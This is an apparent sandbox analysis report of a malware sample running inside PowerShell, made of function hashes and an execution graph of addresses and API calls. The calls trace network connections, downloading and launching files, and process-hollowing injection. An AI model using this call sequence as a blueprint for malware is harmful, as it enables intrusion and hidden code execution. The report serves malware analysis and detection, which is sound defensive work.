                                                          • Opcode ID: 7919cea12cb4c06fbea45009e70666be47f8e953a4f4c1c88c6ac9bf0e83fa0e
                                                          • Instruction ID: 2ff00c7009c70d03ceb61a140ac035e370cea5b074832eaef0da78b5003f66cf
                                                          • Opcode Fuzzy Hash: 7919cea12cb4c06fbea45009e70666be47f8e953a4f4c1c88c6ac9bf0e83fa0e
                                                          • Instruction Fuzzy Hash: 5D41E472E1FE874FF399B72C086527965D1EF55691F4800BAD60ECB1D6FF0C9804464A
                                                          Function 00007FF848FD160B Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 522 7ff848fd160b-7ff848fd1621 524 7ff848fd1623-7ff848fd1627 522->524 525 7ff848fd1629-7ff848fd1715 522->525 524->525 538 7ff848fd171d-7ff848fd1735 525->538
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 502c6bb09139dfe993c3be2dca337052acaa7ab0461dbd1ce7d10a3c2d976319
                                                          • Instruction ID: cc1e2479045fbd9a5251b40819192f2f226e5cc424af10c5462ff5949ebd03c4
                                                          • Opcode Fuzzy Hash: 502c6bb09139dfe993c3be2dca337052acaa7ab0461dbd1ce7d10a3c2d976319
                                                          • Instruction Fuzzy Hash: C5418B7290E7C54FE346A7385868161BFE0EF576A0F0A01FBD089CB1E3E959484AC726
                                                          Function 00007FF848FD33D0 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6bf996cc7ec7a420c1e5da2c7e67eb8b91549275621dc0e0413de0c3a1964d5
                                                          • Instruction ID: 5ffa06204665995524d662ed59a4dffbaedcf85212aae2241f295c3696743d6b
                                                          • Opcode Fuzzy Hash: f6bf996cc7ec7a420c1e5da2c7e67eb8b91549275621dc0e0413de0c3a1964d5
                                                          • Instruction Fuzzy Hash: 3021F333F0D9194FEBA5A66C64052F8B3D1EF996A0F5802B7C60EC31C6EE1DAC514784
                                                          Function 00007FF848FD3128 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca33ae95fa3aa3ff9852827b8a480a43ed06f5ab5e2a786d384e1eb9505ac9fd
                                                          • Instruction ID: 76032dbf407f04f1fac12d9f948a051db9350b1a026bd4dbd8c7633c2cd26366
                                                          • Opcode Fuzzy Hash: ca33ae95fa3aa3ff9852827b8a480a43ed06f5ab5e2a786d384e1eb9505ac9fd
                                                          • Instruction Fuzzy Hash: 6901AD32E1E95B2EF6A9A31C15252B991D2EF84690F4811BAC70FC31C6EE0CAC010689
                                                          Function 00007FF848FD33F1 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3192780f052b438fc6146e1bbc07d041b4cfd4abf7777ff72d22b017c1978c7
                                                          • Instruction ID: a5effedcc5d747c6daed294573f73b5f7b4cdeab00772d58b358bd072c404b72
                                                          • Opcode Fuzzy Hash: d3192780f052b438fc6146e1bbc07d041b4cfd4abf7777ff72d22b017c1978c7
                                                          • Instruction Fuzzy Hash: 37F0BE32F0D99D0EE2A6A22C34052F8A6C1EB956A0B4801B3C60ED3287EE1C9C650684

                                                          Execution Graph

                                                          Execution Coverage:5.1%
                                                          Dynamic/Decrypted Code Coverage:3.6%
                                                          Signature Coverage:9.9%
                                                          Total number of Nodes:1956
                                                          Total number of Limit Nodes:68
                                                          execution_graph 53050 415ef1 53075 408b64 53050->53075 53054 415f08 53083 4020f6 53054->53083 53057 401e65 22 API calls 53058 415f1e 53057->53058 53059 4020f6 28 API calls 53058->53059 53060 415f29 53059->53060 53061 401e65 22 API calls 53060->53061 53062 415f34 53061->53062 53063 4020f6 28 API calls 53062->53063 53064 415f3f 53063->53064 53089 406e07 53064->53089 53068 415f57 53119 401e8d 53068->53119 53072 41709e 53073 401fd8 11 API calls 53072->53073 53074 4170aa 53073->53074 53128 4046f7 53075->53128 53078 401e65 53079 401e6d 53078->53079 53080 401e75 53079->53080 53162 402158 22 API calls 53079->53162 53080->53054 53084 40210c 53083->53084 53085 4023ce 11 API calls 53084->53085 53086 402126 53085->53086 53163 402569 53086->53163 53088 402134 53088->53057 53090 40482d 3 API calls 53089->53090 53091 406e16 53090->53091 53200 4048c8 connect 53091->53200 53095 406e3d 53265 402f10 53095->53265 53098 402f10 28 API calls 53099 406e53 53098->53099 53100 402f10 28 API calls 53099->53100 53101 406e5d 53100->53101 53270 404aa1 53101->53270 53104 401fd8 11 API calls 53105 406e72 53104->53105 53106 401fd8 11 API calls 53105->53106 53107 406e7a 53106->53107 53108 401fd8 11 API calls 53107->53108 53109 406e82 53108->53109 53285 404c10 53109->53285 53111 406e90 53112 401fd8 11 API calls 53111->53112 53113 406e98 53112->53113 53114 401fd8 11 API calls 53113->53114 53115 406ea0 53114->53115 53116 401fd8 11 API calls 53115->53116 53117 406ea8 53116->53117 53118 408b72 99 API calls 53117->53118 53118->53068 53120 402163 53119->53120 53124 40219f 53120->53124 54294 402730 11 API calls 53120->54294 53122 402184 54295 402712 11 API calls std::_Deallocate 53122->54295 53125 401fd8 53124->53125 53126 4023ce 11 API calls 53125->53126 53127 401fe1 53126->53127 53127->53072 53135 4020df 53128->53135 53131 4020df 11 API calls 53132 40471e 53131->53132 53133 404736 53132->53133 53139 40482d 53132->53139 53133->53078 53136 4020e7 53135->53136 53146 4023ce 53136->53146 53138 4020f2 53138->53131 53140 404846 socket 53139->53140 53141 404839 53139->53141 53143 404860 CreateEventW 53140->53143 53144 404842 53140->53144 53161 40489e WSAStartup 53141->53161 53143->53133 53144->53133 53145 40483e 53145->53140 53145->53144 53147 402428 53146->53147 53148 4023d8 53146->53148 53147->53138 53148->53147 53150 4027a7 53148->53150 53151 402e21 53150->53151 53154 4016b4 53151->53154 53153 402e30 53153->53147 53155 4016c6 53154->53155 53156 4016cb 53154->53156 53160 43bd19 11 API calls _abort 53155->53160 53156->53155 53157 4016f3 53156->53157 53157->53153 53159 43bd18 53160->53159 53161->53145 53173 402888 53163->53173 53165 40257d 53166 402592 53165->53166 53167 4025a7 53165->53167 53178 402a34 22 API calls 53166->53178 53180 4028e8 53167->53180 53170 40259b 53179 4029da 22 API calls 53170->53179 53172 4025a5 53172->53088 53174 402890 53173->53174 53175 402898 53174->53175 53191 402ca3 22 API calls 53174->53191 53175->53165 53178->53170 53179->53172 53181 4028f1 53180->53181 53182 402953 53181->53182 53183 4028fb 53181->53183 53198 4028a4 22 API calls 53182->53198 53186 402904 53183->53186 53188 402917 53183->53188 53192 402cae 53186->53192 53189 402915 53188->53189 53190 4023ce 11 API calls 53188->53190 53189->53172 53190->53189 53193 402cb8 __EH_prolog 53192->53193 53199 402e54 22 API calls 53193->53199 53195 4023ce 11 API calls 53197 402d92 53195->53197 53196 402d24 53196->53195 53197->53189 53199->53196 53201 404a1b 53200->53201 53202 4048ee 53200->53202 53203 404a21 WSAGetLastError 53201->53203 53253 40497e 53201->53253 53204 404923 53202->53204 53202->53253 53303 40531e 53202->53303 53205 404a31 53203->53205 53203->53253 53338 420c60 27 API calls 53204->53338 53208 404932 53205->53208 53209 404a36 53205->53209 53215 402093 28 API calls 53208->53215 53343 41cae1 30 API calls 53209->53343 53211 40492b 53211->53208 53214 404941 53211->53214 53212 40490f 53308 402093 53212->53308 53213 404a40 53344 4052fd 28 API calls 53213->53344 53224 404950 53214->53224 53225 404987 53214->53225 53219 404a80 53215->53219 53222 402093 28 API calls 53219->53222 53226 404a8f 53222->53226 53230 402093 28 API calls 53224->53230 53340 421a40 54 API calls 53225->53340 53227 41b4ef 80 API calls 53226->53227 53227->53253 53233 40495f 53230->53233 53232 40498f 53235 4049c4 53232->53235 53236 404994 53232->53236 53237 402093 28 API calls 53233->53237 53342 420e06 28 API calls 53235->53342 53240 402093 28 API calls 53236->53240 53241 40496e 53237->53241 53242 4049a3 53240->53242 53243 41b4ef 80 API calls 53241->53243 53247 402093 28 API calls 53242->53247 53244 404973 53243->53244 53339 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53244->53339 53245 4049cc 53246 4049f9 CreateEventW CreateEventW 53245->53246 53248 402093 28 API calls 53245->53248 53246->53253 53249 4049b2 53247->53249 53251 4049e2 53248->53251 53252 41b4ef 80 API calls 53249->53252 53254 402093 28 API calls 53251->53254 53255 4049b7 53252->53255 53260 402f31 53253->53260 53256 4049f1 53254->53256 53341 4210b2 52 API calls 53255->53341 53258 41b4ef 80 API calls 53256->53258 53259 4049f6 53258->53259 53259->53246 53261 4020df 11 API calls 53260->53261 53262 402f3d 53261->53262 53263 4032a0 28 API calls 53262->53263 53264 402f59 53263->53264 53264->53095 53402 401fb0 53265->53402 53267 402f1e 53268 402055 11 API calls 53267->53268 53269 402f2d 53268->53269 53269->53098 53271 404ab4 53270->53271 53405 40520c 53271->53405 53273 404ac9 ctype 53274 404b40 WaitForSingleObject 53273->53274 53275 404b20 53273->53275 53277 404b56 53274->53277 53276 404b32 send 53275->53276 53278 404b7b 53276->53278 53411 42103a 54 API calls 53277->53411 53281 401fd8 11 API calls 53278->53281 53280 404b69 SetEvent 53280->53278 53282 404b83 53281->53282 53283 401fd8 11 API calls 53282->53283 53284 404b8b 53283->53284 53284->53104 53286 4020df 11 API calls 53285->53286 53287 404c27 53286->53287 53288 4020df 11 API calls 53287->53288 53295 404c30 53288->53295 53292 404ca1 53471 404e26 99 API calls 53292->53471 53295->53292 53297 401fd8 11 API calls 53295->53297 53429 43bd51 53295->53429 53436 404b96 53295->53436 53442 4020b7 53295->53442 53448 401fe2 53295->53448 53457 404cc3 53295->53457 53296 404ca8 53298 401fd8 11 API calls 53296->53298 53297->53295 53299 404cb1 53298->53299 53300 401fd8 11 API calls 53299->53300 53301 404cba 53300->53301 53301->53111 53304 4020df 11 API calls 53303->53304 53305 40532a 53304->53305 53345 4032a0 53305->53345 53307 405346 53307->53212 53309 40209b 53308->53309 53310 4023ce 11 API calls 53309->53310 53311 4020a6 53310->53311 53349 4024ed 53311->53349 53314 41b4ef 53315 41b5a0 53314->53315 53316 41b505 GetLocalTime 53314->53316 53318 401fd8 11 API calls 53315->53318 53317 40531e 28 API calls 53316->53317 53319 41b547 53317->53319 53320 41b5a8 53318->53320 53360 406383 53319->53360 53322 401fd8 11 API calls 53320->53322 53324 41b5b0 53322->53324 53324->53204 53325 402f10 28 API calls 53326 41b55f 53325->53326 53327 406383 28 API calls 53326->53327 53328 41b56b 53327->53328 53365 407200 77 API calls 53328->53365 53330 41b579 53331 401fd8 11 API calls 53330->53331 53332 41b585 53331->53332 53333 401fd8 11 API calls 53332->53333 53334 41b58e 53333->53334 53335 401fd8 11 API calls 53334->53335 53336 41b597 53335->53336 53337 401fd8 11 API calls 53336->53337 53337->53315 53338->53211 53339->53253 53340->53232 53341->53244 53342->53245 53343->53213 53346 4032aa 53345->53346 53347 4028e8 28 API calls 53346->53347 53348 4032c9 53346->53348 53347->53348 53348->53307 53350 4024f9 53349->53350 53353 40250a 53350->53353 53352 4020b1 53352->53314 53354 40251a 53353->53354 53355 402520 53354->53355 53356 402535 53354->53356 53358 402569 28 API calls 53355->53358 53357 4028e8 28 API calls 53356->53357 53359 402533 53357->53359 53358->53359 53359->53352 53366 4051ef 53360->53366 53362 406391 53370 402055 53362->53370 53365->53330 53367 4051fb 53366->53367 53376 405274 53367->53376 53369 405208 53369->53362 53371 402061 53370->53371 53372 4023ce 11 API calls 53371->53372 53373 40207b 53372->53373 53398 40267a 53373->53398 53377 405282 53376->53377 53378 40529e 53377->53378 53379 405288 53377->53379 53380 4052f5 53378->53380 53381 4052b6 53378->53381 53387 4025f0 53379->53387 53396 4028a4 22 API calls 53380->53396 53385 4028e8 28 API calls 53381->53385 53386 40529c 53381->53386 53385->53386 53386->53369 53388 402888 22 API calls 53387->53388 53389 402602 53388->53389 53390 402672 53389->53390 53391 402629 53389->53391 53397 4028a4 22 API calls 53390->53397 53394 4028e8 28 API calls 53391->53394 53395 40263b 53391->53395 53394->53395 53395->53386 53399 40268b 53398->53399 53400 4023ce 11 API calls 53399->53400 53401 40208d 53400->53401 53401->53325 53403 4025f0 28 API calls 53402->53403 53404 401fbd 53403->53404 53404->53267 53406 405214 53405->53406 53407 4023ce 11 API calls 53406->53407 53408 40521f 53407->53408 53412 405234 53408->53412 53410 40522e 53410->53273 53411->53280 53413 405240 53412->53413 53414 40526e 53412->53414 53416 4028e8 28 API calls 53413->53416 53428 4028a4 22 API calls 53414->53428 53418 40524a 53416->53418 53418->53410 53434 446137 ___crtLCMapStringA 53429->53434 53430 446175 53473 4405dd 20 API calls __dosmaperr 53430->53473 53431 446160 RtlAllocateHeap 53433 446173 53431->53433 53431->53434 53433->53295 53434->53430 53434->53431 53472 442f80 7 API calls 2 library calls 53434->53472 53437 404ba0 WaitForSingleObject 53436->53437 53438 404bcd recv 53436->53438 53474 421076 54 API calls 53437->53474 53440 404be0 53438->53440 53440->53295 53441 404bbc SetEvent 53441->53440 53443 4020bf 53442->53443 53444 4023ce 11 API calls 53443->53444 53445 4020ca 53444->53445 53446 40250a 28 API calls 53445->53446 53447 4020d9 53446->53447 53447->53295 53449 401ff1 53448->53449 53456 402039 53448->53456 53450 4023ce 11 API calls 53449->53450 53451 401ffa 53450->53451 53452 40203c 53451->53452 53454 402015 53451->53454 53453 40267a 11 API calls 53452->53453 53453->53456 53475 403098 28 API calls 53454->53475 53456->53295 53458 4020df 11 API calls 53457->53458 53468 404cde 53458->53468 53459 404e13 53460 401fd8 11 API calls 53459->53460 53461 404e1c 53460->53461 53461->53295 53462 4041a2 28 API calls 53462->53468 53463 401fe2 28 API calls 53463->53468 53464 401fd8 11 API calls 53464->53468 53465 4020f6 28 API calls 53465->53468 53468->53459 53468->53462 53468->53463 53468->53464 53468->53465 53476 406eb0 53468->53476 53547 41299f 53468->53547 53591 401fc0 53468->53591 53471->53296 53472->53434 53473->53433 53474->53441 53475->53456 53477 406ec4 53476->53477 53595 4041a2 53477->53595 53480 4020f6 28 API calls 53481 406ee8 53480->53481 53482 4020f6 28 API calls 53481->53482 53483 406ef7 53482->53483 53598 41be1b 53483->53598 53486 406f0b 53491 401e65 22 API calls 53486->53491 53545 4070e6 53486->53545 53487 40702e 53488 401e65 22 API calls 53487->53488 53490 40703a 53488->53490 53489 401e8d 11 API calls 53493 407176 53489->53493 53495 407052 53490->53495 53496 4070eb 53490->53496 53492 406f20 53491->53492 53499 406f38 53492->53499 53500 406fda 53492->53500 53494 401fd8 11 API calls 53493->53494 53497 40717f 53494->53497 53498 401e65 22 API calls 53495->53498 53502 401e65 22 API calls 53496->53502 53501 401fd8 11 API calls 53497->53501 53503 407059 53498->53503 53504 401e65 22 API calls 53499->53504 53506 401e65 22 API calls 53500->53506 53505 407187 53501->53505 53508 4070f1 53502->53508 53509 401e65 22 API calls 53503->53509 53507 406f3f 53504->53507 53505->53468 53511 406fe0 53506->53511 53513 401e65 22 API calls 53507->53513 53510 401e65 22 API calls 53508->53510 53508->53545 53512 40706d 53509->53512 53514 407114 53510->53514 53515 401e65 22 API calls 53511->53515 53511->53545 53518 40da34 32 API calls 53512->53518 53516 406f53 53513->53516 53685 41b9f6 22 API calls 2 library calls 53514->53685 53517 406ffe 53515->53517 53620 40da34 53516->53620 53679 418568 53517->53679 53525 407080 53518->53525 53522 406f66 53528 401e65 22 API calls 53522->53528 53523 407126 53524 407011 53523->53524 53526 418568 31 API calls 53523->53526 53530 402093 28 API calls 53524->53530 53527 401e65 22 API calls 53525->53527 53526->53524 53529 407097 53527->53529 53532 406f7c 53528->53532 53533 40709e URLDownloadToFileW 53529->53533 53531 407160 53530->53531 53534 404aa1 61 API calls 53531->53534 53678 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 53532->53678 53536 406f85 53533->53536 53537 406fd0 53533->53537 53534->53545 53536->53537 53538 401e65 22 API calls 53536->53538 53539 402093 28 API calls 53537->53539 53543 406f98 53538->53543 53540 4070d0 53539->53540 53541 404aa1 61 API calls 53540->53541 53542 4070dd 53541->53542 53682 401f09 53542->53682 53543->53537 53546 406fb5 ShellExecuteW 53543->53546 53545->53489 53546->53537 53548 4129b1 53547->53548 53549 4041a2 28 API calls 53548->53549 53550 4129c4 53549->53550 53551 4020f6 28 API calls 53550->53551 53552 4129d3 53551->53552 53553 4020f6 28 API calls 53552->53553 53554 4129e2 53553->53554 53555 41be1b 28 API calls 53554->53555 53557 4129eb 53555->53557 53556 412a93 53559 401e8d 11 API calls 53556->53559 53557->53556 53558 401e65 22 API calls 53557->53558 53561 412a02 53558->53561 53560 412a9c 53559->53560 53562 401fd8 11 API calls 53560->53562 53563 4020f6 28 API calls 53561->53563 53564 412aa5 53562->53564 53565 412a0d 53563->53565 53566 401fd8 11 API calls 53564->53566 53567 401e65 22 API calls 53565->53567 53568 412aad 53566->53568 53569 412a18 53567->53569 53568->53468 53570 4020f6 28 API calls 53569->53570 53571 412a23 53570->53571 53572 401e65 22 API calls 53571->53572 53573 412a2e 53572->53573 53574 4020f6 28 API calls 53573->53574 53575 412a39 53574->53575 53576 401e65 22 API calls 53575->53576 53577 412a44 53576->53577 53578 4020f6 28 API calls 53577->53578 53579 412a4f 53578->53579 53580 401e65 22 API calls 53579->53580 53581 412a5a 53580->53581 53582 4020f6 28 API calls 53581->53582 53583 412a65 53582->53583 53584 401e65 22 API calls 53583->53584 53585 412a73 53584->53585 53586 4020f6 28 API calls 53585->53586 53587 412a7e 53586->53587 53847 412ab4 GetModuleFileNameW 53587->53847 53592 401fd2 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 53591->53592 53593 401fc9 53591->53593 53592->53468 54153 415aea 53592->54153 54152 4025e0 28 API calls 53593->54152 53686 40423a 53595->53686 53599 4020df 11 API calls 53598->53599 53616 41be2e 53599->53616 53600 401fd8 11 API calls 53601 41bed0 53600->53601 53602 401fd8 11 API calls 53601->53602 53604 41bed8 53602->53604 53603 41bea0 53605 4041a2 28 API calls 53603->53605 53607 401fd8 11 API calls 53604->53607 53608 41beac 53605->53608 53606 4041a2 28 API calls 53606->53616 53610 406f00 53607->53610 53611 401fe2 28 API calls 53608->53611 53609 401fe2 28 API calls 53609->53616 53610->53486 53610->53487 53612 41beb5 53611->53612 53613 401fd8 11 API calls 53612->53613 53615 41bebd 53613->53615 53614 401fd8 11 API calls 53614->53616 53617 41ce34 28 API calls 53615->53617 53616->53603 53616->53606 53616->53609 53616->53614 53619 41be9e 53616->53619 53692 41ce34 53616->53692 53617->53619 53619->53600 53717 401f86 53620->53717 53623 40da70 53742 41b5b4 29 API calls 53623->53742 53624 40daa5 53752 41bfb7 53624->53752 53625 40da66 53627 40db99 GetLongPathNameW 53625->53627 53721 40417e 53627->53721 53629 40da79 53743 401f13 53629->53743 53634 40db00 53637 40417e 28 API calls 53634->53637 53635 40daae 53638 40417e 28 API calls 53635->53638 53636 40417e 28 API calls 53639 40dbbd 53636->53639 53640 40db0e 53637->53640 53641 40dabc 53638->53641 53727 40ddd1 53639->53727 53645 40417e 28 API calls 53640->53645 53646 40417e 28 API calls 53641->53646 53642 401f09 11 API calls 53642->53625 53649 40db24 53645->53649 53650 40dad2 53646->53650 53652 402fa5 28 API calls 53649->53652 53653 402fa5 28 API calls 53650->53653 53651 402fa5 28 API calls 53654 40dbe5 53651->53654 53655 40db2f 53652->53655 53656 40dadd 53653->53656 53657 401f09 11 API calls 53654->53657 53658 401f13 28 API calls 53655->53658 53659 401f13 28 API calls 53656->53659 53660 40dbef 53657->53660 53661 40db3a 53658->53661 53662 40dae8 53659->53662 53663 401f09 11 API calls 53660->53663 53664 401f09 11 API calls 53661->53664 53665 401f09 11 API calls 53662->53665 53666 40dbf8 53663->53666 53667 40db43 53664->53667 53668 40daf1 53665->53668 53669 401f09 11 API calls 53666->53669 53670 401f09 11 API calls 53667->53670 53671 401f09 11 API calls 53668->53671 53672 40dc01 53669->53672 53673 40da83 53670->53673 53671->53673 53674 401f09 11 API calls 53672->53674 53673->53642 53675 40dc0a 53674->53675 53676 401f09 11 API calls 53675->53676 53677 40dc13 53676->53677 53677->53522 53678->53536 53827 4180ef 53679->53827 53683 402252 11 API calls 53682->53683 53684 401f12 53683->53684 53684->53545 53685->53523 53687 404243 53686->53687 53688 4023ce 11 API calls 53687->53688 53689 40424e 53688->53689 53690 402569 28 API calls 53689->53690 53691 4041b5 53690->53691 53691->53480 53693 41ce41 53692->53693 53694 41ce51 53693->53694 53695 41cea0 53693->53695 53699 41ce89 53694->53699 53703 41cfe0 28 API calls 53694->53703 53696 41ceba 53695->53696 53708 41cfe0 28 API calls 53695->53708 53698 41d146 28 API calls 53696->53698 53700 41ce9c 53698->53700 53704 41d146 53699->53704 53700->53616 53703->53699 53705 41d14f 53704->53705 53709 41d1f2 53705->53709 53708->53696 53710 41d1fb 53709->53710 53713 41d2a0 53710->53713 53715 41d2ab 53713->53715 53714 41d159 53714->53700 53715->53714 53716 4020f6 28 API calls 53715->53716 53716->53714 53718 401f8e 53717->53718 53756 402252 53718->53756 53720 401f99 53720->53623 53720->53624 53720->53625 53722 404186 53721->53722 53723 402252 11 API calls 53722->53723 53724 404191 53723->53724 53761 4041bc 53724->53761 53728 40ddd9 53727->53728 53729 402252 11 API calls 53728->53729 53730 40dde4 53729->53730 53731 4041d9 28 API calls 53730->53731 53732 40dbd0 53731->53732 53733 402fa5 53732->53733 53737 402fb4 53733->53737 53734 402ff6 53809 40323f 53734->53809 53736 402ff4 53802 403262 53736->53802 53737->53734 53740 402feb 53737->53740 53808 403211 28 API calls 53740->53808 53742->53629 53744 401f22 53743->53744 53751 401f6a 53743->53751 53745 402252 11 API calls 53744->53745 53746 401f2b 53745->53746 53747 401f6d 53746->53747 53748 401f46 53746->53748 53749 402336 11 API calls 53747->53749 53826 40305c 28 API calls 53748->53826 53749->53751 53751->53673 53753 41bfc4 GetCurrentProcess IsWow64Process 53752->53753 53754 40daaa 53752->53754 53753->53754 53755 41bfdb 53753->53755 53754->53634 53754->53635 53755->53754 53757 4022ac 53756->53757 53758 40225c 53756->53758 53757->53720 53758->53757 53760 402779 11 API calls std::_Deallocate 53758->53760 53760->53757 53762 4041c8 53761->53762 53765 4041d9 53762->53765 53764 40419c 53764->53636 53766 4041e9 53765->53766 53767 404206 53766->53767 53768 4041ef 53766->53768 53782 4027e6 53767->53782 53772 404267 53768->53772 53771 404204 53771->53764 53773 402888 22 API calls 53772->53773 53774 40427b 53773->53774 53775 404290 53774->53775 53776 4042a5 53774->53776 53793 4042df 22 API calls 53775->53793 53778 4027e6 28 API calls 53776->53778 53781 4042a3 53778->53781 53779 404299 53794 402c48 22 API calls 53779->53794 53781->53771 53783 4027ef 53782->53783 53784 402851 53783->53784 53785 4027f9 53783->53785 53801 4028a4 22 API calls 53784->53801 53788 402802 53785->53788 53790 402815 53785->53790 53795 402aea 53788->53795 53791 402813 53790->53791 53792 402252 11 API calls 53790->53792 53791->53771 53792->53791 53793->53779 53794->53781 53796 402af4 __EH_prolog 53795->53796 53797 402e45 22 API calls 53796->53797 53799 402b60 53797->53799 53798 402252 11 API calls 53800 402bce 53798->53800 53799->53798 53800->53791 53803 40326e 53802->53803 53804 402252 11 API calls 53803->53804 53805 403288 53804->53805 53812 402336 53805->53812 53808->53736 53816 4036a6 53809->53816 53811 40324c 53811->53736 53813 402347 53812->53813 53814 402252 11 API calls 53813->53814 53815 4023c7 53814->53815 53815->53651 53817 402888 22 API calls 53816->53817 53818 4036b9 53817->53818 53819 40372c 53818->53819 53820 4036de 53818->53820 53825 4028a4 22 API calls 53819->53825 53823 4027e6 28 API calls 53820->53823 53824 4036f0 53820->53824 53823->53824 53824->53811 53826->53751 53828 41811c 8 API calls 53827->53828 53829 418189 ___scrt_get_show_window_mode 53828->53829 53846 418328 CloseHandle CloseHandle 53828->53846 53830 4181ef CreateProcessW 53829->53830 53829->53846 53831 418225 VirtualAlloc Wow64GetThreadContext 53830->53831 53832 41847a GetLastError 53830->53832 53833 418253 ReadProcessMemory 53831->53833 53834 418444 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 53831->53834 53832->53846 53833->53834 53835 418279 NtCreateSection 53833->53835 53834->53846 53835->53834 53836 4182a1 53835->53836 53837 4182c1 NtMapViewOfSection 53836->53837 53838 4182b0 NtUnmapViewOfSection 53836->53838 53839 4182e5 VirtualFree NtClose TerminateProcess 53837->53839 53840 41832d GetCurrentProcess NtMapViewOfSection 53837->53840 53838->53837 53839->53828 53839->53846 53840->53834 53843 41835a ctype 53840->53843 53841 4183f6 WriteProcessMemory 53841->53834 53844 418415 53841->53844 53842 418419 Wow64SetThreadContext 53842->53834 53845 418432 ResumeThread 53842->53845 53843->53841 53843->53842 53844->53842 53845->53834 53845->53846 53846->53524 53848 4020df 11 API calls 53847->53848 53849 412adf 53848->53849 53850 4020df 11 API calls 53849->53850 53851 412aeb 53850->53851 53852 4020df 11 API calls 53851->53852 53874 412af7 53852->53874 53853 41b978 43 API calls 53853->53874 53854 40d9e8 32 API calls 53854->53874 53855 401fd8 11 API calls 53855->53874 53856 40417e 28 API calls 53856->53874 53857 4042fc 79 API calls 53857->53874 53858 40431d 28 API calls 53858->53874 53859 412c1d Sleep 53859->53874 53860 403014 28 API calls 53860->53874 53861 418568 31 API calls 53861->53874 53862 412cbf Sleep 53862->53874 53863 401f09 11 API calls 53863->53874 53864 412d61 Sleep 53864->53874 53865 412dc4 DeleteFileW 53865->53874 53866 41c485 32 API calls 53866->53874 53867 412dfb DeleteFileW 53867->53874 53868 412e4d Sleep 53868->53874 53869 412e37 DeleteFileW 53869->53874 53870 412ec6 53871 401f09 11 API calls 53870->53871 53872 412ed2 53871->53872 53873 401f09 11 API calls 53872->53873 53875 412ede 53873->53875 53874->53853 53874->53854 53874->53855 53874->53856 53874->53857 53874->53858 53874->53859 53874->53860 53874->53861 53874->53862 53874->53863 53874->53864 53874->53865 53874->53866 53874->53867 53874->53868 53874->53869 53874->53870 53878 412e92 Sleep 53874->53878 53876 401f09 11 API calls 53875->53876 53877 412eea 53876->53877 53995 40b904 53877->53995 53880 401f09 11 API calls 53878->53880 53885 412ea2 53880->53885 53881 412efd 53882 4020f6 28 API calls 53881->53882 53884 412f1d 53882->53884 53883 401f09 11 API calls 53883->53885 54001 41322d 53884->54001 53885->53874 53885->53883 53887 412ec4 53885->53887 53887->53877 53889 401f09 11 API calls 53890 412f34 53889->53890 53891 412f54 53890->53891 53892 4130a8 53890->53892 53894 41bd1e 28 API calls 53891->53894 54013 41bd1e 53892->54013 53896 412f60 53894->53896 54026 41bb8e 53896->54026 53897 402f31 28 API calls 53899 4130e8 53897->53899 53901 402f10 28 API calls 53899->53901 53900 412f7a 53902 402f31 28 API calls 53900->53902 53903 4130f7 53901->53903 53904 412faa 53902->53904 53906 402f10 28 API calls 53903->53906 53905 402f10 28 API calls 53904->53905 53908 412fb9 53905->53908 53907 413103 53906->53907 53909 402f10 28 API calls 53907->53909 53910 402f10 28 API calls 53908->53910 53911 413112 53909->53911 53912 412fc8 53910->53912 53913 402f10 28 API calls 53911->53913 53914 402f10 28 API calls 53912->53914 53915 413121 53913->53915 53916 412fd7 53914->53916 53917 402f10 28 API calls 53915->53917 53918 402f10 28 API calls 53916->53918 53919 413130 53917->53919 53920 412fe6 53918->53920 53921 402f10 28 API calls 53919->53921 53922 402f10 28 API calls 53920->53922 53923 41313f 53921->53923 53924 412ff2 53922->53924 54017 402ea1 53923->54017 53926 402f10 28 API calls 53924->53926 53928 412ffe 53926->53928 53930 402ea1 28 API calls 53928->53930 53929 404aa1 61 API calls 53931 413156 53929->53931 53932 41300d 53930->53932 53933 401fd8 11 API calls 53931->53933 53934 402f10 28 API calls 53932->53934 53935 413162 53933->53935 53936 413019 53934->53936 53938 401fd8 11 API calls 53935->53938 53937 402ea1 28 API calls 53936->53937 53940 413023 53937->53940 53939 41316e 53938->53939 53941 401fd8 11 API calls 53939->53941 53942 404aa1 61 API calls 53940->53942 53943 41317a 53941->53943 53944 413030 53942->53944 53945 401fd8 11 API calls 53943->53945 53946 401fd8 11 API calls 53944->53946 53947 413186 53945->53947 53948 413039 53946->53948 53949 401fd8 11 API calls 53947->53949 53950 401fd8 11 API calls 53948->53950 53951 41318f 